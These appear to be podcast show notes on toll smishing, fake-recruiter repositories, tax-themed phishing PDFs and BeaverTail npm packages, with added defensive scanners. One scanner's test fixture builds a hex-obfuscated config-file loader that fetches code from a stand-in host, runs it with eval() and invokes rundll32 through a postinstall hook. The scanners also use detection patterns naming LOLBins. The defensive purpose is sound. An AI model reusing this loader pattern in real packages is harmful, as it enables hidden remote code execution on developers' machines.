Episode 84: Toll Trolls, Fake Recruiters & Tax-Time Traps

Links 

https://www.axios.com/local/phoenix/2025/04/14/toll-scam-texts-arizona-drivers

https://cybersecuritynews.com/beware-of-fake-unpaid-toll-message-attack

https://www.businessinsider.com/ezpass-text-scam-how-to-spot-2025-3

https://cybersecuritynews.com/beware-of-weaponized-recruitment-emails/
https://cybersecuritynews.com/squid-werewolf-mimic-as-recruiters-attacking-job-seekers/

https://www.techradar.com/pro/security/look-out-for-tax-themed-scams-this-month-microsoft-warns

https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html

https://thehackernews.com/search/label/Remote%20Access%20Trojans

https://thehackernews.com/2024/12/north-korean-hackers-deploy-ottercookie.html

https://thehackernews.com/2025/04/north-korean-hackers-deploy-beavertail.html

Fake Unpaid Toll Messages Target Mobile Users in Credential Theft Scam 

  • In Short
    • A smishing (SMS phishing) campaign is targeting mobile users with fake unpaid-toll notifications, aiming to steal personal and financial information.
    • Victims receive texts claiming they owe tolls, usually threatening fines or license suspension to create urgency.
  • Attack
    • The first message carries no link and simply prompts the recipient to reply, which keeps the first hop free of anything a link filter could flag.
    • Once the victim replies, a second message arrives with a link to a fraudulent website that mimics the official toll collection agency.
  • Targeted
    • The lure adapts to the victim's location, using regional branding and visuals to boost credibility.
  • Infrastructure
    • The campaign runs on the "Lucid" Phishing-as-a-Service (PhaaS) platform.
  • Authorities across multiple states have issued warnings about these scams.
  • Defend Yourself
    • Educate employees through regular training on smishing tactics and how to recognize suspicious messages.
    • Use or deploy mobile device management (MDM) to detect and block malicious messages and links.
    • Encourage employees to verify any unexpected payment request through official channels (the agency's published website or phone number) rather than replying to the message.
    • Monitor threat intelligence for phishing domains that impersonate your organization or the agencies your staff use.
    • Instruct employees to report suspected smishing attempts to IT or the security team promptly.
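A triage routine for the two-stage pattern described above, added here as an example and not code from the episode or the linked articles. It assumes three constructed sample texts, a short list of toll and urgency terms, and a last-two-labels approximation of the registrable domain in place of a public-suffix list; ezpass-toll-pay.example is a placeholder host.

```javascript
// Added example: two-stage triage for toll-themed smishing texts.
// Term lists, weights and sample messages are constructed for illustration.

const TOLL_TERMS = ["toll", "ezpass", "e-zpass"];
const URGENCY_RE = /\b(final notice|immediately|within 24 hours|penalty|fine|suspen(?:d|sion)|legal action)\b/i;
// "reply Y", "Reply with 'yes'", etc.: the first-stage lure that carries no link.
const REPLY_BAIT = /\breply\s+(?:with\s+)?["'\u201c]?[a-z0-9]{1,4}["'\u201d]?\b/i;
// Bare or scheme-prefixed hostname followed by an optional path.
const URL_RE = /(?:https?:\/\/)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:\/\S*)?/i;

// Constructed sample messages; ezpass-toll-pay.example is a placeholder host.
const SAMPLE_MESSAGES = [
  "E-ZPass Final Notice: you have an unpaid toll of $6.99. To avoid a $50 penalty and license suspension, reply Y to receive your payment link.",
  "Your toll balance is due. Pay now at https://ezpass-toll-pay.example/pay to avoid legal action.",
  "Your dentist appointment is tomorrow at 3pm. Reply C to confirm.",
];

function extractUrlHost(text) {
  const m = text.match(URL_RE);
  if (!m) return null;
  const raw = /^https?:\/\//i.test(m[0]) ? m[0] : "http://" + m[0];
  try { return new URL(raw).hostname.toLowerCase(); } catch { return null; }
}

// Approximation: last two labels. A real deployment would consult a public-suffix list.
function registrableDomain(host) {
  return host.split(".").slice(-2).join(".");
}

function assessHost(host) {
  if (registrableDomain(host).endsWith(".gov")) {
    return { lookalike: false, label: "government domain (still confirm through the agency's own site)" };
  }
  if (TOLL_TERMS.some(t => host.includes(t))) {
    return { lookalike: true, label: "toll brand inside a non-government domain" };
  }
  return { lookalike: false, label: "unbranded link host" };
}

// Returns { stage, score, reasons }: stage1 = link-less lure asking for a reply,
// stage2 = follow-up carrying the link, none = not toll-themed.
function triageSms(text) {
  const lower = text.toLowerCase();
  if (!TOLL_TERMS.some(t => lower.includes(t))) return { stage: "none", score: 0, reasons: [] };
  const reasons = ["toll-themed"];
  let score = 2;
  if (URGENCY_RE.test(text)) { reasons.push("urgency or threat language"); score += 1; }
  const host = extractUrlHost(text);
  let stage = "unclear";
  if (host === null) {
    if (REPLY_BAIT.test(text)) {
      stage = "stage1";
      reasons.push("no link; asks for a reply (the link arrives in the follow-up)");
      score += 2;
    }
  } else {
    const a = assessHost(host);
    stage = "stage2";
    reasons.push(`link host ${host}: ${a.label}`);
    score += a.lookalike ? 3 : 1;
  }
  return { stage, score, reasons };
}

for (const msg of SAMPLE_MESSAGES) console.log(JSON.stringify(triageSms(msg)));
```

The point of scoring the link-less first message on its own is that a rule that only inspects URLs never sees it; the reply is what tells the operator the number is live, so the stage-1 pattern deserves a verdict before any link exists.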

Weaponized Recruitment Emails Delivering BeaverTail and Tropidoor Malware 

  • In Short
    • A campaign in which threat actors impersonate recruiters to distribute malware to job seekers. It exploits the target's eagerness to pursue an opportunity, leading to the inadvertent installation of malicious software.
  • Impersonation of Recruiters
    • Attackers pose as recruitment professionals and send emails linking to code repositories presented as part of a job opportunity.
    • The repositories contain seemingly legitimate project files, including a tailwind.config.js file embedded with obfuscated JavaScript.
    • That code executes a downloader, car.dll.
  • Malware Components
    • BeaverTail: JavaScript-based malware hidden inside configuration files; it steals web browser credentials and cryptocurrency wallet data.
    • Tropidoor: a backdoor that establishes encrypted communication with command-and-control servers and can execute over 20 commands, including file manipulation and process injection.
    • Living off the Land binaries (LOLBins): built-in Windows tools such as PowerShell and rundll32 are used to execute the payloads, which helps evade security detections.
  • Attribution
    • Evidence points to North Korean threat actors, with techniques resembling those used by the Lazarus Group.
  • Defense
    • Conduct regular training on phishing tactics, emphasizing caution with unsolicited job-related communications; a repository sent as part of a supposed hiring process should be inspected, or run only in a disposable VM, before anything in it is executed.
    • Implement advanced email filtering to detect and block phishing attempts.
    • Endpoint Protection: deploy endpoint detection and response (EDR) tools capable of identifying and mitigating malicious activity, including unusual rundll32 or PowerShell child processes spawned by a developer's node process.
    • Continuously monitor network traffic for unusual patterns that may indicate compromised systems communicating with external servers.
    • Enforce the principle of least privilege so users have only the access their roles require, limiting the damage from a compromised account.

Cybercriminals Exploit Tax-Themed Phishing to Deploy Advanced Malware 

  • In Short
    • Microsoft has warned of a surge in tax-themed phishing campaigns that exploit the urgency of the U.S. tax season to distribute malware and steal credentials. The attacks use malicious PDFs and QR codes to bypass security controls and target a wide range of organizations.
  • Tax Season
    • Tax-related themes make the phishing emails look legitimate and are used to trick recipients into divulging sensitive information.
  • Malicious Attachments
    • PDF attachments contain links or QR codes that take users to fraudulent websites impersonating trusted services such as DocuSign or Microsoft 365 login pages.
    • A QR code moves the URL out of the message text and into an image, so it is typically scanned on a phone that sits outside corporate email and web controls.
  • Malware
    • Payloads include BruteRatel C4 (BRc4), Latrodectus, AHKBot, GuLoader and Remcos RAT.
  • Targets
    • Over 2,300 organizations, mainly in the engineering, IT and consulting sectors.
  • Attribution
    • Microsoft attributes this activity to the group Storm-0249.
  • Protect
    • Conduct regular training on phishing tactics, including QR codes delivered in attachments.
    • Deploy advanced email filtering capable of detecting and quarantining suspicious messages and attachments.
    • Enforce MFA on all user accounts, preferring phishing-resistant methods, since a fake Microsoft 365 login page captures whatever password and one-time code the user types into it.
    • Keep all systems and applications up to date with security patches to close known vulnerabilities.
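A triage pass for the PDF-attachment path described above, added as an example and not code from Microsoft's advisory or either article. It pulls link targets out of a PDF's /URI annotations, including the hex-string encoding that a plain grep for "http" misses, and checks whether a brand named in the hostname is actually the registered domain. SAMPLE_PDF is a constructed minimal document and the `.example` hosts are placeholders; BRAND_DOMAINS is an illustrative allowlist, not a complete inventory of either vendor's domains.

```javascript
// Added example: extract /URI link targets from a PDF (literal and hex-string
// forms) and flag hostnames that name a brand they are not registered under.
// SAMPLE_PDF is constructed; BRAND_DOMAINS is an illustrative allowlist only.

const BRAND_DOMAINS = {
  docusign: ["docusign.com", "docusign.net"],
  microsoft: ["microsoft.com", "microsoftonline.com", "office.com", "live.com"],
};

const hex = s => Buffer.from(s, "latin1").toString("hex");

const SAMPLE_PDF = [
  "%PDF-1.4",
  "1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
  "2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
  "3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R 6 0 R] >> endobj",
  "4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://login.microsoftonline.com/) >> >> endobj",
  "5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://docusign-secure.verify-tax-forms.example/review) >> >> endobj",
  // Hex-string form of the same key: scanners that only grep for "http" miss it.
  "6 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI <" + hex("https://microsoft365-taxrefund.example/login") + "> >> >> endobj",
  // A QR code arrives as an image object; reading it needs an image/QR decoder.
  "7 0 obj << /Type /XObject /Subtype /Image /Width 200 /Height 200 >> endobj",
  "trailer << /Root 1 0 R >>",
  "%%EOF",
].join("\n");

function extractPdfUris(pdf) {
  const uris = [];
  // Literal string (...) with \-escapes, or hex string <...>.
  const re = /\/URI\s*(?:\(((?:[^()\\]|\\.)*)\)|<([0-9a-fA-F\s]+)>)/g;
  let m;
  while ((m = re.exec(pdf)) !== null) {
    if (m[1] !== undefined) uris.push(m[1].replace(/\\([()\\])/g, "$1"));
    else uris.push(Buffer.from(m[2].replace(/\s+/g, ""), "hex").toString("latin1"));
  }
  return uris;
}

function hostOf(uri) {
  try { return new URL(uri).hostname.toLowerCase(); } catch { return null; }
}

// A brand token in the hostname is only fine when the registered domain belongs to the brand.
function brandVerdict(host) {
  for (const [brand, owned] of Object.entries(BRAND_DOMAINS)) {
    if (!host.includes(brand)) continue;
    const legit = owned.some(d => host === d || host.endsWith("." + d));
    return { brand, verdict: legit ? "brand-owned" : "lookalike" };
  }
  return { brand: null, verdict: "unbranded" };
}

function triagePdf(pdf) {
  const links = extractPdfUris(pdf).map(uri => {
    const host = hostOf(uri);
    return host ? { uri, host, ...brandVerdict(host) } : { uri, host: null, brand: null, verdict: "unparseable" };
  });
  return {
    links,
    lookalikes: links.filter(l => l.verdict === "lookalike"),
    hasJavaScript: /\/(?:JavaScript|JS)\b/.test(pdf),
    hasLaunch: /\/Launch\b/.test(pdf),
    hasImages: /\/Subtype\s*\/Image\b/.test(pdf),  // QR codes live here; this check only says "look closer"
  };
}

console.log(JSON.stringify(triagePdf(SAMPLE_PDF), null, 2));
```

The hasImages flag is deliberately weak: the QR route defeats URL extraction entirely, so a mail gateway either decodes embedded images or accepts that the link will be opened on an unmanaged phone.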

North Korean Hackers Exploit npm Packages to Distribute BeaverTail Malware in Supply Chain Attack 

  • In Short
    • North Korean threat actors associated with the "Contagious Interview" campaign have stepped up distribution of the BeaverTail malware through malicious npm packages. The packages, disguised as legitimate developer tools, have been downloaded over 5,600 times, posing significant risk to software supply chains.
  • Malicious npm Packages
    • Eleven npm packages, including:
      • empty-array-validator
      • twitterapis
      • dev-debugger-vite
      • events-utils
      • icloud-cod
    • Payload: BeaverTail malware.
    • Designed to look like standard utilities in order to deceive developers.
  • Obfuscation
    • Hexadecimal string encoding, used to evade automated scanners and manual code review.
  • Remote Access Trojan (RAT)
    • The malicious code functions as a loader, dynamically fetching remote JavaScript and executing it via eval().
    • This lets the attackers run arbitrary code on infected systems and stage additional malware.
  • Diversified Distribution
    • Some packages are linked to Bitbucket repositories, diversifying the distribution channels beyond npm and GitHub.
  • Campaign
    • Exploits job interview themes, with packages hosted in directories named "eiwork_hire".
  • Persistence
    • The actors keep coming back, creating new npm accounts and deploying varied malware under fresh aliases.
  • Protect
    • Only allow vetted and trusted npm packages.
    • Regularly audit dependencies and remove anything suspicious or unnecessary.
    • Educate developers about the risks of third-party packages and the importance of verifying a package's authenticity before integrating it.
    • Deploy tools that analyze and monitor dependencies for malicious behavior, such as dynamic code execution or obfuscated scripts, and disable install hooks (npm install --ignore-scripts) where the build allows.
    • Watch outbound network traffic for unusual patterns that may indicate communication with command-and-control servers.
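A static triage pass covering both the weaponized-repository story above (obfuscated JavaScript in tailwind.config.js that launches a downloader through rundll32) and this npm story (hex-encoded strings feeding eval()), added as an example rather than code from either article or from any package they name. The sample package, its postinstall hook, the names "sample-dev-tool" and "sample-math", the car.dll invocation form and the host loader.example are constructed; the rule weights are illustrative. The scanner decodes \xNN escapes before matching, so a loader that hides the word eval behind hex still trips the rule.

```javascript
// Added example: static triage of a JavaScript package for the loader traits
// described above. Sample package, hook, names, DLL invocation form and the
// loader.example host are constructed; rule weights are illustrative.

const DYNAMIC_EXEC = /\beval\b|\bnew\s+Function\b|\bFunction\s*\(/;
const NETWORK = /\brequire\s*\(\s*["'](?:https?|net)["']\s*\)|\bfetch\s*\(|\baxios\b/;
const PROCESS = /\bchild_process\b|\brundll32\b|\bpowershell\b|\bregsvr32\b|\bmshta\b/i;
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const WEIGHTS = { "lifecycle-script": 2, "hex-escape-obfuscation": 2, "remote-code-loader": 4, "dynamic-exec": 1, "lolbin-or-child-process": 2 };

// Turn every character into a \xNN escape, the way the obfuscated loaders do.
function hexEscape(s) {
  return Array.from(s, ch => "\\x" + ch.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Constructed loader: fetch remote JavaScript, eval() it, then run a DLL via rundll32.
const LOADER_SRC = [
  'const { exec } = require("child_process");',
  'require("https").get("https://loader.example/p", r => {',
  '  let d = ""; r.on("data", c => d += c);',
  '  r.on("end", () => { eval(d); exec("rundll32.exe car.dll"); });',
  "});",
].join("\n");

// Constructed package: a benign-looking Tailwind config with the loader hidden in hex.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({
    name: "sample-dev-tool", version: "1.0.0",
    scripts: { postinstall: "node tailwind.config.js" },
  }, null, 2),
  "tailwind.config.js": [
    'module.exports = { content: ["./src/**/*.{js,ts}"], theme: { extend: {} } };',
    'const k = "' + hexEscape("eval") + '";',
    'const s = "' + hexEscape(LOADER_SRC) + '";',
    "global[k](s);",
  ].join("\n"),
};

const BENIGN_PACKAGE = {
  "package.json": JSON.stringify({ name: "sample-math", version: "1.0.0" }),
  "index.js": "module.exports = (a, b) => a + b;",
};

// Fraction of the file that is \xNN escapes (each escape is four characters).
function hexEscapeDensity(text) {
  const n = (text.match(/\\x[0-9a-fA-F]{2}/g) || []).length;
  return text.length ? (n * 4) / text.length : 0;
}

function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function scanSource(file, text) {
  const findings = [];
  const density = hexEscapeDensity(text);
  if (density > 0.3) findings.push({ file, rule: "hex-escape-obfuscation", detail: `${Math.round(density * 100)}% of bytes are \\xNN escapes` });
  const plain = decodeHexEscapes(text);   // match on the de-obfuscated text
  const dyn = DYNAMIC_EXEC.test(plain), net = NETWORK.test(plain);
  if (dyn && net) findings.push({ file, rule: "remote-code-loader", detail: "network fetch feeding eval/Function" });
  else if (dyn) findings.push({ file, rule: "dynamic-exec", detail: "eval/Function without a visible network source" });
  const proc = plain.match(PROCESS);
  if (proc) findings.push({ file, rule: "lolbin-or-child-process", detail: proc[0] });
  return findings;
}

function scanPackage(files) {
  const findings = [];
  const manifest = files["package.json"] ? JSON.parse(files["package.json"]) : {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (manifest.scripts && manifest.scripts[hook]) {
      findings.push({ file: "package.json", rule: "lifecycle-script", detail: `${hook}: ${manifest.scripts[hook]}` });
    }
  }
  for (const [file, text] of Object.entries(files)) {
    if (/\.(?:c|m)?js$/.test(file)) findings.push(...scanSource(file, text));
  }
  const riskScore = findings.reduce((sum, f) => sum + (WEIGHTS[f.rule] || 0), 0);
  return { findings, riskScore };
}

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

Run it against a cloned "assignment" repository or an unpacked npm tarball before anything in it executes; the install hook finding alone is reason to add --ignore-scripts, and the remote-code-loader finding is the eval()-of-fetched-JavaScript pattern both stories describe.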
